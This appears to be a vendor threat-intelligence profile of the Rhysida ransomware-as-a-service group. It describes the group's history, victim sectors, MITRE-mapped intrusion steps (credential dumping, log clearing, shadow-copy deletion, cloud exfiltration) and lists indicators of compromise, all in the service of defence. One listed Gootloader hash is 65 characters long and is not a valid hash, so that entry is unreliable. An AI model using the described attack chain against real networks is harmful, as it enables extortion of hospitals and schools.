THREAT ACTOR

Rhysida

5.8
THREAT LEVEL
EMERGENCE DATE
May 2023
CATEGORY
Ransomware-as-a-Service
AFFILIATIONS

Strong connections to Vice Society (DEV-0832); operates independently

DEscription

Rhysida ransomware emerged in May 2023 as a Ransomware-as-a-Service (RaaS) operation, initially establishing itself through high-impact attacks on critical infrastructure sectors. Operating under the moniker "Rhysida-0.1", the group demonstrated technical proficiency with RSA-4096 and ChaCha20 encryption, rapidly targeting organizations where operational disruption creates maximum leverage. The group notably lacks a full-featured victim support portal common among more mature RaaS operations, relying instead on basic TOR-based communication channels. Recent intelligence indicates significant operational changes, with activity declining substantially from late 2024 into 2025, suggesting disruption from the February 2024 free decryptor release and a marked reduction in operational prominence.

Despite reduced volume, the group maintains persistent targeting of healthcare and education sectors, leveraging double extortion tactics with ransom demands typically ranging from hundreds of thousands to several million dollars. The group's infrastructure has evolved to include multi-tiered command-and-control (C2) systems and cross-platform capabilities with Linux/ESXi variants, though overall operational tempo suggests a group experiencing significant transition rather than expansion.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
lethality
Evaluates the potential for damage from the attack, including the ability to disrupt operations, and cause financial loss, damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type of Actor: Ransomware-as-a-Service (RaaS)

Rhysida operates as an independent RaaS platform where developers provide ransomware tools and infrastructure to affiliates who conduct attacks in exchange for profit sharing. Intelligence analysis indicates strong operational connections to Vice Society (DEV-0832), with Vice Society's cessation in June 2023 coinciding precisely with Rhysida's emergence. The groups share considerable overlap in tactics, techniques, and procedures, along with similar targeting preferences for education and healthcare sectors. These consistent attack methodologies and operational patterns suggest possible operator transition or resource sharing between the groups.

Current Status: Active but significantly diminished - minimal incidents reported in Q1 2025, representing substantial decrease from Q4 2024. (Threat levels reflect the group's activity level.)

Threat Level:
5.8

Origins and Methodology

Rhysida represents an evolution within the ransomware ecosystem, emerging as Vice Society operations declined. The group's rapid establishment of technical capabilities and immediate focus on high-value sectors points to mature operational planning from inception. Utilizing strong encryption schemes and multi-platform variants, the operation quickly established credibility within the RaaS ecosystem, though recent operational disruptions have significantly impacted their prominence.

The group's methodology centers on living-off-the-land techniques and legitimate tool abuse, minimizing malware footprint while maintaining operational effectiveness. This approach, combined with their hybrid encryption implementation and multi-threaded processing capabilities, positions them as a technically capable yet currently diminished threat actor.

What is the Evolution of Rhysida Ransomware?
0.1
Formation

Rhysida publicly emerged on May 17, 2023, with establishment of their TOR-based victim support portal, though indicators suggest preparatory operations beginning in January 2023. Initial attacks showed immediate focus on high-value sectors including healthcare, education, and government organizations, establishing the group as a credible threat within the RaaS ecosystem.

0.2
EVOLUTION

The group expanded capabilities with a Linux variant targeting VMware ESXi servers, aligning with broader ransomware trends prioritizing virtual infrastructure. Despite temporary disruption from the February 2024 free decryptor release that exploited encryption implementation flaws, Rhysida quickly adapted its tooling and resumed activity. However, recent months show signs of diminished momentum, with activity declining substantially from late 2024 into 2025.

0.3
Lineage/Connections

Operating as a RaaS model enables flexible affiliate-driven attacks across diverse sectors. The tactical and temporal correlation with Vice Society's decline strongly suggests operational continuity, with shared tools, methodologies, and targeting preferences indicating either direct operator transition or coordinated resource sharing. This positions Rhysida as an evolution of established ransomware operations rather than an entirely new entrant.

Which Unique Techniques Does Rhysida Use?

Rhysida employs attack methodologies combining phishing campaigns, VPN exploitation, and living-off-the-land techniques. The group utilizes Cobalt Strike and similar command-and-control frameworks to manage compromised systems, deploying PowerShell scripts to deliver ransomware payloads.

TECHNIQUE

DETAILS

Infection Vectors

Access gained through spear-phishing (T1566.001/T1566.002), VPN exploitation lacking MFA (T1133), and RDP compromise (T1021.001) via credential stuffing. Campaigns also leverage Gootloader malware and SEO poisoning through typo-squatted domains.

Target Selection

Targets education, healthcare, manufacturing, and government. Roughly half of victims are in Europe (especially the UK) and one-quarter in North America. Emphasis on sectors with sensitive data and operational pressure points.

Operational Complexity

Employs custom "Rhysida0.1" ransomware, Zabbix-monitored admin panels, and event log clearing via wevtutil. Encryption uses AES256-CTR with RSA4096 or ChaCha20, executing via multi-threaded routines per processor core.

Key Features & Technical Details

The group's technical architecture demonstrates mature development practices with cross-platform capabilities and encryption implementation.

FEATURE

DETAILS

Encryption Method

Hybrid encryption using RSA4096 with ChaCha20 or AES256-CTR; targets 1 MiB chunks at specific offsets

File Extension

.rhysida extension appended to encrypted files

Ransom Note

CriticalBreachDetected.pdf with Bitcoin payment and TOR portal instructions

Double Extortion

Threatens data exposure on TOR-based leak sites; supports dedicated leak infrastructure

Communication Channels

Basic TOR portals with victim IDs; lacks full-featured negotiation platforms

Deployment Speed

Multi-threaded execution matching CPU core count for rapid encryption

Killswitch

No known killswitch

Payment Method

Exclusive Bitcoin payments with detailed purchase instructions

Operational Model

RaaS model with affiliate-driven attacks and revenue sharing

Activities

Rhysida achieved a consistent operational tempo throughout 2024, with monthly victim counts ranging from minimal to nearly twenty at peak periods. The group's data leak site accumulated over one hundred victims, reflecting sustained targeting across multiple geographic regions. Operations reached peak activity mid-year before experiencing a marked decline following the release of a free decryptor tool that exploited encryption implementation flaws.

This disruption, combined with possible affiliate attrition, resulted in dramatically reduced activity entering 2025, with incident reports dropping to minimal levels compared to previous quarters.

Which Industries Are Most Vulnerable to Rhysida?

Education and healthcare sectors dominate the victim landscape, with educational institutions representing approximately one-third of attacks and healthcare organizations accounting for roughly one-quarter. Schools and universities face targeting due to budget constraints and aging infrastructure, while hospitals become prime targets given their critical patient care requirements and low tolerance for downtime.

Manufacturing and government entities round out the primary targets. Manufacturing facilities suffer from exposed operational technology and production dependencies, making them unable to afford extended disruptions. Smaller municipalities with limited security budgets prove especially vulnerable. This strategic focus on critical infrastructure maximizes pressure for ransom payment through operational necessity.

HAL Most Recent Attacks

Modus Operandi

Rhysida employs a structured multi-phase approach designed for maximum impact while evading detection through legitimate tool abuse and minimal malware footprint.

Details

Leverages spear-phishing campaigns (T1566.001/T1566.002) with malicious attachments, often utilizing Gootloader malware for initial foothold. Exploits VPN vulnerabilities (T1133) particularly targeting services without MFA implementation. Compromises exposed RDP services (T1021.001) through credential stuffing and brute force attacks. Recent campaigns incorporate search engine optimization poisoning through typo-squatted domains.

Details

Conducts extensive network reconnaissance using built-in Windows utilities and PowerShell scripts (T1057). Enumerates domain controllers, file servers, and backup systems to identify critical assets. Maps network topology and identifies security tool deployments for evasion planning. Utilizes Active Directory queries to understand organizational structure and privileged accounts.

Details

Deploys Cobalt Strike beacons (S0154) for persistent command and control infrastructure. Establishes RDP sessions for manual operations and data staging. Implements PortStarter backdoor (main.dll) for redundant access channels. Maintains multiple access vectors to ensure operational continuity during remediation attempts.

Details

Clears event logs using wevtutil (T1070.001) to remove forensic artifacts. Employs PowerShell obfuscation techniques to bypass security controls. Masquerades processes as legitimate Windows services (T1036). Disables security software through BYOVD (Bring Your Own Vulnerable Driver) attacks when administrative access achieved.

Details

Harvests credentials using Mimikatz and similar tools (T1003). Targets LSASS memory dumps for password extraction. Exploits stored credentials in browsers and credential managers. Leverages compromised service accounts for elevated privileges and lateral movement.

Details

Establishes multi-tiered C2 infrastructure using TOR and compromised legitimate sites. Implements Cobalt Strike with custom profiles to evade detection. Utilizes encrypted channels over standard ports (443/HTTPS) to blend with normal traffic. Maintains redundant C2 nodes across multiple geographic regions for resilience.

Details

Leverages PsExec (S0029) for remote execution across domain systems. Utilizes RDP for manual movement between compromised hosts. Exploits Windows Management Instrumentation (WMI) (T1047) for stealthy execution. Targets domain controllers and file servers to maximize encryption impact.

Details

Stages data in C:\out directories before exfiltration to cloud storage. Utilizes Azure Storage Explorer and AZCopy for bulk data transfers (T1567.002). Compresses sensitive files using WinRAR before exfiltration. Targets specific file types including databases, financial records, and personally identifiable information.

Details

Creates scheduled tasks (T1053) configured to survive system reboots. Modifies registry keys for autostart functionality. Deploys PowerShell scripts in startup folders for redundant persistence. Establishes multiple persistence mechanisms to maintain access during partial remediation.

Details

Achieves widespread file encryption across enterprise environments within hours. Disrupts critical business operations through systematic targeting of essential systems. Creates significant recovery challenges through VSS deletion and backup targeting. Compounds damage through data theft and publication threats in double extortion model.

Details

Deploys "Rhysida-0.1" ransomware binary through PowerShell or manual execution. Implements intermittent encryption of 1 MiB chunks for speed optimization. Appends .rhysida extension to encrypted files. Targets both local drives and mapped network shares for maximum impact.

Details

Deploys "CriticalBreachDetected.pdf" ransom notes across encrypted systems. Directs victims to TOR-based payment portals with unique identifiers. Threatens data publication on dedicated leak sites if demands not met within specified timeframes. Demands range from hundreds of thousands to millions in Bitcoin payments.

Details

Deletes Volume Shadow Copies (VSS) to prevent file recovery (T1490). Disables Windows recovery options and system restore points. Removes ransomware binaries and staging directories after encryption completion. Clears additional logs and forensic artifacts to complicate incident response.

Indicators of Compromise (IOCs)

Key indicators help identify Rhysida operations within networks, particularly specific file hashes, network infrastructure, and behavioral patterns associated with their attack methodology.

INDICATOR

DETAILS

File Hashes

a0dc80a37eb7e2716c02a94adc8df9baedec192a77bde31669faed228d9ff526 (conhost.exe ransomware)
921df888aaabcd828a3723f4c9f5fe8b8379c6b7067d16b2ea10152300417eae (PsExec64 lateral movement)
3c4bfaa7b89e2e028f9f92c1ccb74f79f08b53a91e0c5e7e3e8b5f55e209f8cd (main.dll backdoor)
7a4b5e2c8f9d3b1a6e5c4d2f8b9a7c3e1d6f5a8b9c2e4d7f6a8b5c9d3e7f2a4b6 (Gootloader)

IP Addresses

5.255.113.37, 23.108.57.83, 156.96.62.58, 146.70.104.249

Domains/URLs

776c5589.schedule.newhomessection[.]com, codeforprofessionalusers[.]com, oij89jiiuguygh.blob.core.windows[.]net

File Paths

C:\in, C:\out (staging), C:\Users\Public\main.dll (PortStarter), Registry modifications via cmd.exe

File Extensions

.rhysida

Exploits and Vulnerabilities

Rhysida leverages known vulnerabilities and infrastructure weaknesses to establish initial access and maintain persistence throughout their operations.

EXPLOITS AND VULNERABILITIES

CVE

CVSS

DESCRIPTION

ZeroLogon

CVE-2020-1472

10.0

Microsoft Netlogon privilege escalation flaw allowing domain controller compromise via cryptographic bypass


Beyond specific CVE exploits, Rhysida commonly targets unpatched VPN vulnerabilities, particularly services lacking multi-factor authentication (MFA) or running outdated firmware. The group also exploits Remote Desktop Protocol (RDP) weaknesses through brute force attacks and credential stuffing against exposed services. These infrastructure vulnerabilities represent primary initial access vectors alongside phishing campaigns.